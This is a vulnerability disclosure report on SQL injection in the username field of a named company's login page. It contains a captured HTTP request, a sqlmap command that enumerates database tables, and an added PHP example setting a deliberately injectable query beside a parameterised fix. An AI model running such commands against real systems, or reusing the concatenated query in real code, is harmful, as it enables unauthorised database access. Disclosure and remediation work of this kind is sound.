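2015-11-21: Details reported to the vendor; awaiting vendor handling
2015-11-24: Vendor confirmed; details disclosed to the vendor only
2015-12-04: Details disclosed to core white hats and experts in related fields
2015-12-14: Details disclosed to regular white hats
2015-12-24: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public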
:)
微影时代 business operations system
http://biz.wepiao.com/index.php?r=/Public/login
SQL injection, parameter LoginForm[username]
POST /index.php?r=/Public/login HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://biz.wepiao.com/index.php?r=/Public/login
Content-Length: 116
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: PHPSESSID=l7buavlqbb61qkee4ncuiok8s5
Host: biz.wepiao.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

LoginForm%5bpassword%5d=g00dPa%24%24w0rD&LoginForm%5busername%5d=wjyvgyqg&LoginForm%5bverifyCode%5d=g00dPa%24%24w0rD
SQL verification:
sqlmap.py -r f:\**\**.txt -D channel --tables --time-sec 2 -p LoginForm[username] --level 3
Stopping here; nothing further was attempted.
Filter.
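The finding is an injectable LoginForm[username] value and the suggested fix is filtering. The PHP/PDO sketch below is an added example, not code from the vendor or the reporter: it contrasts a lookup that splices the form value into the SQL text with one that binds it as a parameter. The table, columns, function names and sample account are assumptions constructed for illustration.

```php
<?php
// Added example. Table, columns and the sample account are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
$pdo->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)')
    ->execute(['alice', password_hash('constructed-password', PASSWORD_DEFAULT)]);

// Weak form: the form value is spliced into the SQL text, so a quote
// character in it changes how the statement parses.
function findUserConcat(PDO $pdo, string $username): ?array
{
    $sql = "SELECT id, pw_hash FROM users WHERE username = '$username'";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Corrected form: reject non-string or oversized input, then bind the value
// so the database only ever sees it as data.
function findUserBound(PDO $pdo, $username): ?array
{
    if (!is_string($username) || $username === '' || strlen($username) > 64) {
        return null; // also covers array input such as LoginForm[username][]=x
    }
    $stmt = $pdo->prepare('SELECT id, pw_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function login(PDO $pdo, array $form): bool
{
    $row = findUserBound($pdo, $form['username'] ?? null);
    $password = $form['password'] ?? '';
    return $row !== null && is_string($password)
        && password_verify($password, $row['pw_hash']);
}

$name = "o'brien"; // constructed input containing a quote character
try {
    findUserConcat($pdo, $name);
    echo "concat: statement parsed\n";
} catch (PDOException $e) {
    echo "concat: the quote altered the statement and the query failed\n";
}
var_dump(findUserBound($pdo, $name));
var_dump(login($pdo, ['username' => 'alice', 'password' => 'constructed-password']));
var_dump(login($pdo, ['username' => ['x'], 'password' => 'p']));
```

Binding fixes the query structure before the value arrives, which is why it holds up where character filtering alone tends to miss encodings and edge cases.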
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-11-24 09:47
Thanks to the white hat for the submission
None yet